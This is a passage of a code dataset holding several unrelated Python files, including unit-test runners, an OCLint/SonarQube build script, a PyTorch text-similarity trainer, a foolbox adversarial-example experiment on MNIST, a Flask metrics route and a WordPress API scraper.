objectiveBest)\n\ndef bruteForceMinimum2D(objectiveFunction,xSearchRange,ySearchRange,constraints,resolution):\n\n\tobjectiveExpression = sy.sympify(objectiveFunction)\n\tconstraintExpressions = []\n\tfor constraint in constraints:\n\t\tconstraintExpressions.append(sy.sympify(constraint))\n\n\txArray = np.arange(xSearchRange[0], xSearchRange[1], resolution).tolist()\n\tyArray = np.arange(ySearchRange[0], ySearchRange[1], resolution).tolist()\n\n\txBest = 999999999.9\n\tyBest = 999999999.9\n\tzBest = 9999999.9999\n\n\t# Iteration loop\n\tfor x in xArray:\n\t\tprint(\"x position: %2.4f\" % (x))\n\t\tfor y in yArray:\n\t\t\tz = evaluateExpression(expression=objectiveExpression, x=x,y=y)\n\t\t\tvalidPoint = True\n\t\t\tif z < zBest:\n\t\t\t\tfor g in constraintExpressions:\n\t\t\t\t\tif evaluateExpression(expression=g,x=x,y=y) > 0:\n\t\t\t\t\t\tvalidPoint = False\n\n\t\t\t\tif validPoint == True:\n\t\t\t\t\txBest = x\n\t\t\t\t\tyBest = y\n\t\t\t\t\tzBest = z\n\n\treturn (xBest, yBest, zBest)\n","sub_path":"NumericalOptimization.py","file_name":"NumericalOptimization.py","file_ext":"py","file_size_in_byte":26617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"187628408","text":"# -*- coding:utf-8 -*-\n__author__ = 'Eike'\nimport os\nimport time\nimport unittest\nimport threading\nfrom common import HTMLTestRunner,data\n# from common import HTMLTestRunner_cn,data\n\n\n# 用例路径\n# case_path = os.path.join(os.getcwd(), \".\")\ncase_path = data.file+'UIAutoTestCase_papa/TestCase/'\nresult = data.file+\"selenium/\"\n\ndef Createsuite():\n # 定义单元测试容器\n testunit = unittest.TestSuite()\n # 定搜索用例文件的方法\n discover = unittest.defaultTestLoader.discover(case_path, pattern='TC_ppandroid8_buy_below.py',\n top_level_dir=None)# 将测试用例加入测试容器中\n # discover = unittest.defaultTestLoader.discover(case_path, pattern='TC_1ppandroid9_buy_above.py',\n # top_level_dir=None) # 将测试用例加入测试容器中\n # discover = unittest.defaultTestLoader.discover(case_path, pattern='TC_1ppandroid10_saling_above.py',\n # top_level_dir=None) # 将测试用例加入测试容器中\n for test_suite in discover:\n for casename in test_suite:\n testunit.addTest(casename)\n print(casename)\n return testunit\ntest_case = Createsuite()\n\n\n# 定义个报告存放路径,支持相对路径\n# tdresult = result + day\nif os.path.exists(result):\n imestr = time.strftime('%Y%m%d%H%M%S', time.localtime(time.time()))\n filename = result + \"pp_Android.html\"\n fp = open(filename, 'wb')\n # 定义测试报告\n runner = HTMLTestRunner.HTMLTestRunner(stream=fp, title='啪啪钱包ndroid自动化回归测试报告', description='用例执行情况:')\n # runner = HTMLTestRunner_cn.HTMLTestRunner(stream=fp, title='信用管家android服务模块自动化回归测试报告',\n # description='用例执行情况:',\n # verbosity=2,\n # retry=1)\n # 运行测试用例\n runner.run(test_case)\n fp.close() # 关闭报告文件\nelse:\n os.mkdir(result)\n filename = result + \"\\\\\" + \"pp_Android.html\"\n fp = open(filename, 'wb')\n # 定义测试报告\n runner = HTMLTestRunner.HTMLTestRunner(stream=fp, title='啪啪钱包ndroid自动化回归测试报告', description='用例执行情况:')\n # runner = HTMLTestRunner_cn.HTMLTestRunner(stream=fp, title='信用管家android服务模块自动化回归测试报告',\n # description='用例执行情况:',\n # verbosity=2,\n # retry=1)\n # 运行测试用例\n runner.run(test_case)\n fp.close() # 关闭报告文件\n","sub_path":"UIAutoTestCase_papa-master-318dedd5f9b3bd112147717b3e654d000e216775/UIAutoTestCase_papa-master-318dedd5f9b3bd112147717b3e654d000e216775/run_all_cases_all.py","file_name":"run_all_cases_all.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"230436699","text":"import os\nfrom timeit import default_timer as timer\nimport random\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom sklearn.metrics import roc_auc_score\nimport nsml\n\nimport data_utils\nimport data_local_loader\n\nfrom args import get_config\nfrom data_local_loader import get_dataloaders\nfrom model import CharCNNScorer\n\n\nTRAIN_BATCH_IDX = 0\n\n\ndef bind_nsml(model, optimizer, config):\n def save(dir_name, *args, **kwargs):\n os.makedirs(dir_name, exist_ok=True)\n state = {\n \"model\": model.state_dict(),\n \"optimizer\": optimizer.state_dict(),\n }\n torch.save(state, os.path.join(dir_name, \"model\"))\n print(\"saved\")\n\n def load(dir_name, *args, **kwargs):\n state = torch.load(os.path.join(dir_name, \"model\"))\n model.load_state_dict(state[\"model\"])\n optimizer.load_state_dict(state[\"optimizer\"])\n print(\"loaded\")\n\n def infer(dataset_path):\n return _infer(model, config, dataset_path)\n\n nsml.bind(save=save, load=load, infer=infer)\n\n\ndef _infer(model, config, dataset_path):\n test_loader = data_local_loader.QuerySimDataLoader(\n dataset_path,\n \"test_data\",\n label_file_name=None,\n batch_size=config.batch_size,\n max_sequence_len=config.max_sequence_len,\n is_train=False,\n shuffle=False,\n )\n\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n all_logits = []\n for i, (uid, a_seqs, len_a_seqs, b_seqs, len_b_seqs) in enumerate(test_loader):\n a_seqs, b_seqs = a_seqs.to(device), b_seqs.to(device)\n logits = model(a_seqs, b_seqs, len_a_seqs, len_b_seqs)\n all_logits.append(torch.sigmoid(logits).data.cpu().numpy())\n\n all_logits = np.concatenate(all_logits, axis=0)\n return all_logits\n\n\ndef run_epoch(\n epoch_idx,\n data_loader,\n model,\n criterion,\n optimizer,\n device,\n log_steps,\n):\n total_loss = 0\n epoch_preds = []\n epoch_targets = []\n epoch_start = timer()\n\n for i, (uid, a_seqs, len_a_seqs, b_seqs, len_b_seqs, labels) in enumerate(data_loader):\n a_seqs, b_seqs, labels = a_seqs.to(device), b_seqs.to(device), labels.to(device)\n\n logits = model(a_seqs, b_seqs, len_a_seqs, len_b_seqs)\n loss = criterion(logits, labels)\n\n batch_loss = loss.data.cpu().item()\n total_loss += batch_loss\n\n if data_loader.is_train:\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n global TRAIN_BATCH_IDX\n\n nsml.report(\n summary=False,\n step=TRAIN_BATCH_IDX,\n scope=locals(),\n **{\n f\"train__batch_loss\": batch_loss,\n })\n\n if i > 0 and i % log_steps == 0:\n print(f\"batch {i:5} loss > {loss.item():.4}\")\n\n TRAIN_BATCH_IDX += 1\n\n epoch_preds.append(torch.sigmoid(logits).data.cpu().numpy())\n epoch_targets.append(labels.int().data.cpu().numpy())\n\n score = roc_auc_score(\n np.concatenate(epoch_targets, axis=0),\n np.concatenate(epoch_preds, axis=0),\n )\n\n mode = \"train\" if data_loader.is_train else \"valid\"\n print(f\"epoch {epoch_idx:02} {mode} score > {score:.4} ({int(timer() - epoch_start)}s)\")\n\n total_loss /= len(data_loader.dataset)\n return score, total_loss\n\n\nif __name__ == \"__main__\":\n config = get_config()\n\n # random seed\n random.seed(config.seed)\n np.random.seed(config.seed)\n torch.random.manual_seed(config.seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed(config.seed)\n\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n print(f\"device: {device}\")\n\n model = CharCNNScorer(\n vocab_size=len(data_utils.vocabs),\n char_embed_size=config.char_embed_size,\n filter_sizes=config.filter_sizes,\n sentence_embed_size=config.sentence_embed_size,\n dropout=config.dropout,\n activation=config.activation,\n pad_ind=data_utils.PAD_IND,\n ).to(device)\n print(str(model))\n\n optimizer = optim.Adam(\n filter(lambda p: p.requires_grad, model.parameters()),\n lr=config.learning_rate,\n )\n\n bind_nsml(model, optimizer, config)\n if config.pause:\n nsml.paused(scope=locals())\n\n if config.mode == \"train\":\n print(\"train\")\n\n train_loader, valid_loader = get_dataloaders(config)\n criterion = nn.BCEWithLogitsLoss()\n\n num_batches = len(train_loader.dataset) // config.batch_size\n num_batches = num_batches + int((len(train_loader.dataset) % config.batch_size) > 0)\n print(f\"number of batches per epoch: {num_batches}\")\n\n best_epoch_idx = -1\n best_valid_score = 0\n early_stop_count = 0\n\n # train\n for epoch_idx in range(1, config.num_epochs + 1):\n\n def _run_epoch(data_loader):\n return run_epoch(\n epoch_idx,\n data_loader,\n model,\n criterion,\n optimizer,\n device,\n config.log_steps\n )\n\n model.train()\n train_score, train_loss = _run_epoch(train_loader)\n\n # evaluate\n model.eval()\n with torch.no_grad():\n valid_score, valid_loss = _run_epoch(valid_loader)\n if best_valid_score < valid_score:\n best_valid_score = valid_score\n best_epoch_idx = epoch_idx\n print(f\"* best valid score {best_valid_score:.4} achieved at epoch {best_epoch_idx:02}\")\n early_stop_count = 0\n else:\n early_stop_count += 1\n\n if early_stop_count >= config.early_stop_threshold:\n print(\"early stopping\")\n break\n\n nsml.report(\n summary=True,\n step=epoch_idx,\n scope=locals(),\n **{\n \"train__epoch_score\": float(train_score),\n \"train__epoch_loss\": float(train_loss),\n \"valid__epoch_score\": float(valid_score),\n \"valid__epoch_loss\": float(valid_loss),\n })\n\n nsml.save(str(epoch_idx))\n\n print(f\"***** best valid score {best_valid_score:.4} achieved at epoch {best_epoch_idx:02}\")\n","sub_path":"18_tcls_query/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"197951139","text":"#!/usr/local/bin/python\n# coding=utf-8\n\n\nimport json\nimport math\nimport os\nimport xml.etree.cElementTree as ET\nimport re\n\n\n# 规则\n\n# 变量最长值 default 20\nLONG_VARIABLE_NAME = 20\n\n# 变量最短值 default 3\nSHORT_VARIABLE_NAME = 3\n\n# 圈复杂度 defualt 10\nCYCLOMATIC_COMPLEXITY = 10\n\n# 类行数 default 1000\nLONG_CLASS = 1000\n\n# 行字节数 default 100\nLONG_LINE = 130\n\n# 方法行数 default 50\nLONG_METHOD = 150\n\n# 忽略注释后括号后的有效代码行数 default 30\nNCSS_METHOD = 130\n\n# 嵌套深度 default 5\nNESTED_BLOCK_DEPTH = 5\n\n# 路径复杂度 default 200\nNPATH_COMPLEXITY = 200\n\n# 类属性字段数量 default 20\nTOO_MANY_FIELDS = 20\n\n# 类方法数量 default 30\nTOO_MANY_METHODS = 30\n\n# 方法参数 default 10\nTOO_MANY_PARAMETERS = 10\n\n\n# 违规阀值\nMAX_PRIORITY1 = 1000000\nMAX_PRIORITY2 = 1000000\nMAX_PRIORITY3 = 1000000\n\n# 每个文件最大Json个数\nmaxCountPerFile = 1000\n\nreversed_json_file_name = 'compile_commands'\n\n\n# 配置信息\nglobal_properties = {}\n\n\n# 准备工作\ndef prepare():\n\n if os.path.exists(\"xcodebuild.log\"):\n os.remove(\"xcodebuild.log\")\n print(\"Remove xcodebuild.log\")\n\n if os.path.exists(\"compile_commands.json\"):\n os.remove(\"compile_commands.json\")\n print(\"Remove compile_commands.json\")\n\n if os.path.exists(\"oclint.xml\"):\n os.remove(\"oclint.xml\")\n print(\"Remove oclint.xml\")\n\n\n# 加载配置文件\ndef load_properties(file_name):\n\n try:\n fopen = open(file_name, 'r')\n for line in fopen:\n line = line.strip()\n if line.find('=') > 0 and not line.startswith('#'):\n strs = line.split('=')\n global_properties[strs[0].strip()] = strs[1].strip()\n except Exception as e:\n print(e.message)\n else:\n fopen.close()\n\n\n# 读配置文件\ndef read_properties(key_value, default_value=''):\n\n if key_value in global_properties.keys():\n return global_properties[key_value]\n else:\n return default_value\n\n\n# 编译\ndef xcode_build(work_space, scheme):\n clean_command = \"xcodebuild -workspace %s -scheme %s -configuration Debug clean\" % (work_space, scheme)\n os.system(clean_command)\n\n build_command = \"xcodebuild COMPILER_INDEX_STORE_ENABLE=NO CLANG_ENABLE_MODULE_DEBUGGING=NO -workspace %s -scheme %s -configuration Debug build | tee xcodebuild.log | xcpretty -r json-compilation-database --output compile_commands.json\" % (work_space, scheme)\n os.system(build_command)\n\n\n# 重命名\ndef rename(file_path, new_name):\n paths = os.path.split(file_path)\n\n new_path = os.path.join(paths[0], new_name)\n\n os.rename(file_path, new_path)\n\n return new_path\n\n\n# 分割Json文件\ndef split_json(all_json_objects):\n total_count = len(all_json_objects)\n sub_file_count = int(math.ceil(float(total_count) / float(maxCountPerFile)))\n\n sub_files = []\n\n for i in range(sub_file_count):\n start = i*maxCountPerFile\n end = min((i+1)*maxCountPerFile, total_count)\n sub_json_objects = all_json_objects[start:end]\n file_name = 'compile_commands%02d.json' % (i+1)\n sub_files.append(file_name)\n\n with open(file_name, 'w') as outputHandler:\n outputHandler.write(json.dumps(sub_json_objects, indent=4))\n\n return sub_files\n\n\n# 分析Json文件\ndef lint_jsonfiles(jsonfiles):\n\n i = 0\n result_files = []\n for file_name in jsonfiles:\n print('linting ... %s' % file_name)\n input_file = rename(file_name, 'compile_commands.json')\n out_file = 'oclint%02d.xml' % i\n lint(out_file)\n result_files.append(out_file)\n i += 1\n os.remove(input_file)\n\n return result_files\n\n\n# 读取分析参数\ndef lint_parameter(type_value):\n\n result = \"\"\n parameter_list = []\n\n if type_value == \"-e\" or type_value == \"e\" or type_value == \"enclude\":\n ignores = read_properties(\"sonar.ignores\")\n\n if ignores.find(\",\"):\n parameter_list = ignores.split(\",\")\n\n for str in parameter_list:\n result = result + \" -e \" + str\n else:\n result = ignores\n\n elif type_value == \"-i\" or type_value == \"i\" or type_value == \"include\":\n sources = read_properties(\"sonar.sources\")\n\n if sources.find(\",\"):\n parameter_list = sources.split(\",\")\n\n for str in parameter_list:\n result = result + \" -i \" + str\n else:\n result = sources\n\n else:\n print(\"Unknow type valuse\")\n\n return result\n\n\n# oclint分析\ndef lint(out_file):\n\n i_flag = lint_parameter(\"i\")\n e_flag = lint_parameter(\"e\")\n\n print(\"iFlag=%s\" % i_flag)\n print(\"eFlag=%s\" % e_flag)\n\n lint_command = '''oclint-json-compilation-database -v%s%s\\\n -- \\\n --verbose \\\n -rc=LONG_VARIABLE_NAME=%d \\\n -rc=SHORT_VARIABLE_NAME=%d \\\n -rc=CYCLOMATIC_COMPLEXITY=%d \\\n -rc=LONG_CLASS=%d \\\n -rc=LONG_LINE=%d \\\n -rc=LONG_METHOD=%d \\\n -rc=NCSS_METHOD=%d \\\n -rc=NESTED_BLOCK_DEPTH=%d \\\n -rc=NPATH_COMPLEXITY=%d \\\n -rc=TOO_MANY_FIELDS=%d \\\n -rc=TOO_MANY_METHODS=%d \\\n -rc=TOO_MANY_PARAMETERS=%d \\\n --report-type pmd \\\n -max-priority-1=100000 \\\n -max-priority-2=100000 \\\n -max-priority-3=100000 \\\n -o %s''' % (i_flag, e_flag, LONG_VARIABLE_NAME, SHORT_VARIABLE_NAME, CYCLOMATIC_COMPLEXITY, LONG_CLASS, LONG_LINE, LONG_METHOD, NCSS_METHOD, NESTED_BLOCK_DEPTH, NPATH_COMPLEXITY,TOO_MANY_FIELDS, TOO_MANY_METHODS, TOO_MANY_PARAMETER, out_file)\n os.system(lint_command)\n\n\n# 合并结果\ndef combine_outputs(output_files):\n\n first_index = 0\n\n for i in range(len(output_files)):\n if os.path.exists(output_files[i]):\n first_index = i\n break\n\n base_tree = ET.ElementTree(file=output_files[first_index])\n base_root = base_tree.getroot()\n\n left_files = output_files[first_index:len(output_files)]\n for left_file in left_files:\n\n if os.path.exists(left_file):\n\n try:\n tree = ET.ElementTree(file=left_file)\n except Exception as e:\n if e.message.find(\"not well-formed (invalid token)\") == -1:\n print(e.message)\n\n else:\n text = open(left_file).read()\n text = re.sub(\"&\", \"&\", text)\n root = ET.fromstring(text)\n\n for child in root:\n base_root.append(child)\n\n else:\n root = tree.getroot()\n\n for child in root:\n base_root.append(child)\n\n base_tree.write('oclint.xml', encoding='utf-8', xml_declaration=True)\n\n\n# 上报结果\ndef report():\n print(\"Running SonarQube using sonar-scanner\")\n\n os.system(\"sonar-scanner\")\n\n\nif __name__ == \"__main__\":\n\n print(\"========== JDJR code analysis ==========\")\n\n prepare()\n\n load_properties(\"sonar-project.properties\")\n\n work_space = read_properties(\"sonar.objectivec.workspace\")\n if len(work_space) == 0:\n print(\"Please assign sonar.objectivec.workspace\")\n\n scheme = read_properties(\"sonar.objectivec.appScheme\")\n\n if len(scheme) == 0:\n print(\"Please assign sonar.objectivec.appScheme\")\n\n xcode_build(work_space, scheme)\n\n with open(\"compile_commands.json\", 'r') as r_handler:\n json_objects = json.loads(r_handler.read())\n\n # 未超出数量,直接分析\n if len(json_objects) <= maxCountPerFile:\n lint('oclint.xml')\n else:\n\n json_file = rename(\"compile_commands.json\", 'input.json')\n json_files = split_json(json_objects)\n xml_files = lint_jsonfiles(json_files)\n\n combine_outputs(xml_files)\n for xml_file in xml_files:\n\n if os.path.exists(xml_file):\n os.remove(xml_file)\n\n rename(json_file, 'compile_commands.json')\n\n report()\n","sub_path":"Other/sonar-oclint/code_analysis.py","file_name":"code_analysis.py","file_ext":"py","file_size_in_byte":7923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"341232168","text":"import cv2\nimport numpy as np\nimport argparse\nfrom matplotlib import pyplot as plt\n\ndef FindPixels(img):\n\n image = cv2.imread('/Users/Dave/Documents/deepdish/data1/set2/'+img+'.JPG')\n image = cv2.resize(image, (700,525))\n hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n\n # define the list of color boundaries 0 < H < 180, 0 < S < 255, 0 < V < 255\n color_ranges = [\n ([30, 128, 128], [32, 255, 228]), #detects yellow (rgb)\n ([0, 128, 0], [15, 255, 156]), #detects red (rgb)\n ([110, 100, 0], [120, 255, 100]) # detects blue (rgb) \n ]\n\n for (lower, upper) in color_ranges:\n # create NumPy arrays from the boundaries\n lower = np.array(lower, dtype = \"uint8\")\n upper = np.array(upper, dtype = \"uint8\")\n \n # find the colors within the specified boundaries and apply the mask\n mask = cv2.inRange(hsv, lower, upper)\n output = cv2.bitwise_and(hsv, hsv, mask = mask)\n \n # show the images\n # cv2.imshow(\"images\", np.hstack([image, output]))\n # cv2.waitKey(0)\n\n\n\nFindPixels('GOPR1799')\nprint('complete')\n\n\n\n\n\n# write function that takes image and returns pixel width of each three","sub_path":"depthdetect.py","file_name":"depthdetect.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"421907739","text":"#!/usr/bin/env python 2.7\n# -*- coding: utf-8 -*-\n\nfrom app import app\nimport pymongo\nfrom flask import render_template, jsonify, request\nfrom app.core.datatask.userCore import user_growth_info\nfrom app.core.datatask.dayCore import get_day_norms\nfrom app.core.datatask.weekCore import get_week_norms\nfrom app.core.datatask.globalCore import get_global_norms\n\nclient = pymongo.MongoClient(\"127.0.0.1\",27017)\ndb = client.test\n\nnorm_map = {\n '用户增长量': 'growth', '用户增长率': 'growth_rate',\n '付费用户增长量': 'growth_pay', '付费用户增长率': 'growth_pay_rate',\n '新用户付费比率': 'pay_rate', '一次购买量': 'once', '二次购买量': 'twice', '二次以上购买量': 'more',\n '付费用户总数': 'pay_user_count', '一次购买率': 'once_rate', '二次购买率': 'twice_rate', '多次购买率': 'more_rate'\n}\n\n@app.route('/norm/show', methods=['GET'])\ndef norm_show():\n norm_collect = db['norm']\n day_norms = norm_collect.find({'flag': 'day'}).sort('norm.date', pymongo.DESCENDING)\n week_norms = norm_collect.find({'flag': 'week'}).sort('norm.date', pymongo.DESCENDING)\n global_norms = norm_collect.find({'flag': 'global'}).sort('norm.date', pymongo.DESCENDING)\n return render_template('norm/index.html', day_norms=day_norms, week_norms=week_norms, global_norms=global_norms)\n\n\n@app.route('/norm/index', methods=['GET'])\ndef norm_index():\n norms = {\n 'increase_norm': ['用户增长量', '用户增长率', '付费用户增长量', '付费用户增长率', '新用户付费比率', ],\n 'pay_norm': ['一次购买量', '二次购买量', '二次以上购买量', '付费用户总数', '一次购买率', '二次购买率', '多次购买率']\n }\n return render_template('norm/normData.html', norms=norms, increase_len=len(norms['increase_norm']), pay_len=len(norms['pay_norm']))\n\n\n@app.route('/norm/work', methods=['POST'])\ndef norm_index_work():\n start_date = request.form['startDay']\n end_date = request.form['endDay']\n index_type = request.form['indextype']\n time_choose = request.form['timeChoose']\n\n result_date, result_data = user_growth_info(start_date, end_date, time_choose)\n\n # if time_choose == u'day':\n # date_list, day_norm_dict = get_day_norms(start_date, end_date)\n # norm_data = day_norm_dict[norm_map[str(index_type)]]\n # elif time_choose == u'week':\n # date_list, week_norm_dict = get_week_norms(start_date, end_date)\n # norm_data = week_norm_dict[norm_map[str(index_type)]]\n # else:\n # date_list, global_norm_dict = get_global_norms(start_date, end_date)\n # norm_data = global_norm_dict[norm_map[str(index_type)]]\n\n return jsonify({'date_list': result_date, 'norm_data': result_data[norm_map[str(index_type)]]})\n\n\n@app.route('/norm/info/~', methods=['GET'])\ndef norm_info(start_date, end_date):\n pass\n # date_list_day, day_norm_dict = get_day_norms(start_date, end_date)\n # date_list_week, week_norm_dict = get_week_norms(start_date, end_date)\n # date_list_global, global_norm_dict = get_global_norms(start_date, end_date)\n # return jsonify({'date_list_day': date_list_day, 'day_norm_dict': day_norm_dict, 'date_list_week': date_list_week,\n # 'week_norm_dict': week_norm_dict, 'date_list_global': date_list_global, 'global_norm_dict': global_norm_dict})\n","sub_path":"app/routes/normRoute.py","file_name":"normRoute.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"118991677","text":"class Matrix:\n def __init__(self, matrix):\n self.matrix = matrix\n\n def __str__(self):\n result_list = []\n for i, _ in enumerate(self.matrix):\n for col in self.matrix[i]:\n result_list.append(f'{col} ')\n result_list.append('\\n')\n result_str = ''\n return result_str.join(result_list)\n\n def __add__(self, other):\n\n # Здесь делаем проверку размеров матриц\n identical = ValueError('Матрицы разного размера')\n if len(self.matrix) != len(other.matrix):\n raise identical\n for i, _ in enumerate(self.matrix):\n if len(self.matrix[i]) != len(other.matrix[i]):\n raise identical\n\n # Здесь выполняем сложение матриц\n result = []\n for i, _ in enumerate(self.matrix):\n line = []\n for j, _ in enumerate(self.matrix[i]):\n sum_m = self.matrix[i][j] + other.matrix[i][j]\n line.append(sum_m)\n result.append(line)\n return Matrix(result)\n\n\n# Проверяем сложение матриц разных размеров\nm_1 = Matrix([[1, 2, 3], [4, 5, 6], [7, 8, 9]])\nm_2 = Matrix([[1, 2, 3], [4, 5, 6], [7, 8, 9]])\nm_3 = Matrix([[1, 2], [4, 5], [7, 8]])\ntry:\n m_4 = m_1 + m_2 + m_3\n print(m_4)\nexcept ValueError as e:\n print(f'Ошибка слагаемых - {e}')\n\n# Проверяем сложение матриц одинаковых размеров\nm_5 = Matrix([[1, 2, 3, 44], [4, 5, 6, 43], [7, 8, 9, 7]])\nm_6 = Matrix([[1, 2, 3, 22], [4, 5, 6, 1], [7, 8, 9, 15]])\nm_7 = Matrix([[1, 2, 33, 0], [4, 5, 14, 21], [7, 8, 93, 4]])\nm_8 = Matrix([[23, 4, 22, 45], [12, 43, 2, 16], [32, 23, 4, 14]])\ntry:\n m_9 = m_5 + m_6 + m_7 + m_8\n print(m_9)\nexcept ValueError as e:\n print(f'Ошибка слагаемых - {e}')\n","sub_path":"Lesson_7/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"335043554","text":"\r\ndef binarySearch (arr, l, r, x):\r\n if r >= l: \r\n mid = l + (r - l) // 2\r\n if arr[mid] == x: \r\n return mid \r\n elif arr[mid] > x: \r\n return binarySearch(arr, l, mid-1, x) \r\n else: \r\n return binarySearch(arr, mid + 1, r, x) \r\n else: \r\n return -1\r\n\r\ndef fn():\r\n n = int(input().strip())\r\n a = list(map(int,input().strip().split()))\r\n b = list(map(int,input().strip().split()))\r\n xor = []\r\n flag = 0\r\n count = 0\r\n c = list(a) + list(b)\r\n\r\n for i in range(n):\r\n for j in range(n):\r\n xor.append(a[i]^b[j])\r\n\r\n xor.sort()\r\n c = list(set(c))\r\n c.sort()\r\n\r\n # for i in range(len(xor)):\r\n # for j in range(len(c)):\r\n # if(xor[i] == c[j]):\r\n # count += 1\r\n # break\r\n\r\n for i in range(len(xor)):\r\n if(binarySearch(c,0,2*n-1,xor[i]) != -1):\r\n count += 1\r\n \r\n\r\n if(count%2==0):\r\n print(\"Yes\")\r\n else:\r\n print(\"No\")\r\n\r\n\r\nfor _ in range(int(input().strip())):\r\n fn()","sub_path":"python/Yes_XOR_No.py","file_name":"Yes_XOR_No.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"148340891","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\nfrom keras.models import Model,Input,load_model\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nimport foolbox\n\n\nmnist = input_data.read_data_sets(\"../MNIST_data/\", one_hot=True)\n\ntest=mnist.test.images\n\nclass Exp3(object):\n def __init__(self,model_path,mnist,sample_size=100,epoch=100,lst=[1,3,5]):\n '''\n model_path:模型的路径\n mnist:mnist数据集合\n sample_size:采样的个数\n epoch:采样的轮数\n lst:指定哪几层\n ps:抽样使用的分层抽样 每次保证正确和错误的比例相同\n '''\n self.model_path=model_path\n self.mnist=mnist\n self.sample_size=sample_size\n self.epoch=epoch\n self.lst=lst\n self.model=load_model(self.model_path)\n\n self.model_layer=Model(inputs=self.model.input,outputs=[self.model.layers[i].output for i in lst])\n\n self.lst=lst\n\n self.layer_num=0\n for index in lst:\n self.layer_num+=int(self.model.layers[index].output.shape[-1])\n\n\n self.foolmodel=foolbox.models.KerasModel(self.model,bounds=(0,1),preprocessing=(0,1))\n\n self.attack=foolbox.attacks.IterativeGradientAttack(self.foolmodel)\n\n\n def _split_test(self):\n\n label=np.argmax(self.mnist.test.labels,axis=1)\n pred=np.argmax(self.model.predict(self.mnist.test.images),axis=1)\n self.badcase=self.mnist.test.images[pred!=label]\n self.goodcase=self.mnist.test.images[pred==label]\n\n return len(self.badcase),len(self.goodcase)\n\n def _count(self,image,threshold):\n act_layers=self.model_layer.predict_on_batch(image)\n\n act_num=0\n act_lst=[]\n for act in act_layers:\n act_lst.append(np.sum(act>threshold,axis=0)>0)\n act_num+=(np.sum(act>threshold,axis=0)>0).sum()\n\n ratio=act_num/float(self.layer_num)\n return act_lst,ratio\n\n def _adv(self,image):\n adv_lst=[]\n org_lst=[]\n for img in image:\n label=np.argmax(self.model.predict(np.expand_dims(img,axis=0)))\n adv=self.attack(img,label,epsilons=[0.01,0.1,1],steps=100)\n if isinstance(adv,np.ndarray):\n adv_lst.append(adv)\n org_lst.append(img)\n return np.array(adv_lst),np.array(org_lst)\n\n\n def exp(self):\n _,good_num=self._split_test()\n\n result=[]\n\n for epoch in tqdm(range(self.epoch)):\n good_index=np.random.choice(range(good_num),size=self.sample_size,replace=False)\n\n adv_lst,org_lst=self._adv(self.goodcase[good_index])\n\n print(adv_lst.shape,org_lst.shape)\n\n act_adv,ratio_adv=self._count(adv_lst,threshold=0.1)\n\n act_org,ratio_org=self._count(org_lst,threshold=0.1)\n\n result.append([ratio_adv,ratio_org])\n return pd.DataFrame(result,columns=['adv','org'])\n\nif __name__=='__main__':\n model_path='./model/model.hdf5'\n obj=Exp3(model_path,mnist,sample_size=100,epoch=10,lst=[1,3,5])\n result=obj.exp()\n","sub_path":"DNNmutation-master/DNNmutation-master/Exp_cover/CoverAdv.py","file_name":"CoverAdv.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"440462875","text":"# -*- coding:utf-8 -*-\r\n\"\"\" Scraping tools for the WordPress API.\r\n\r\nWE1S Chomp\r\n\"\"\"\r\n\r\nfrom logging import getLogger\r\n\r\nfrom chomp import browser, clean\r\n\r\n\r\n# WordPress API Settings\r\nWP_API_URL = '/wp-json/wp/v2/'\r\nWP_PAGES_URL = 'pages?search={query}&sentence=1'\r\nWP_POSTS_URL = 'posts?search={query}&sentence=1'\r\n\r\n\r\ndef is_wordpress_url(url):\r\n \"\"\" Checks if URL has a WordPress site.\r\n\r\n Returns:\r\n bool: True if API present, False if disabled or not found.\r\n \"\"\"\r\n\r\n log = getLogger(__name__)\r\n\r\n url = url.rstrip('/')\r\n\r\n log.debug('Testing for WordPress API at: %s', url)\r\n response = browser.get_json_from_url(url)\r\n if response is not None and response['namespace'] == 'wp/v2':\r\n log.debug('Ok!')\r\n return True\r\n\r\n log.debug('No API or bad response.')\r\n return False\r\n\r\n\r\ndef get_api_results(url, query):\r\n \"\"\" Collects articles from a WordPress site via the API.\r\n \"\"\"\r\n\r\n log = getLogger(__name__)\r\n chomp_urls = []\r\n\r\n url = url.rstrip('/')\r\n log.info('Querying \"%s\" using WordPress API at: %s', query, url)\r\n if not is_wordpress_url(url):\r\n log.info('WordPress API not found, moving on.')\r\n return None\r\n\r\n # Build the query urls.\r\n query = query.replace(' ', '+')\r\n chomp_urls.append(WP_API_URL + WP_PAGES_URL.format(query=query))\r\n chomp_urls.append(WP_API_URL + WP_POSTS_URL.format(query=query))\r\n\r\n # Do scrape.\r\n for chomp_url in chomp_urls:\r\n for response in browser.get_json_from_url(chomp_url):\r\n \r\n log.debug('Collecting: %s', response['link'])\r\n\r\n yield dict(\r\n slug=response['slug'],\r\n date=clean.from_datetime_str(response['date']),\r\n title=clean.from_html(response['title']['rendered']),\r\n url=response['link'],\r\n search_url=chomp_url,\r\n 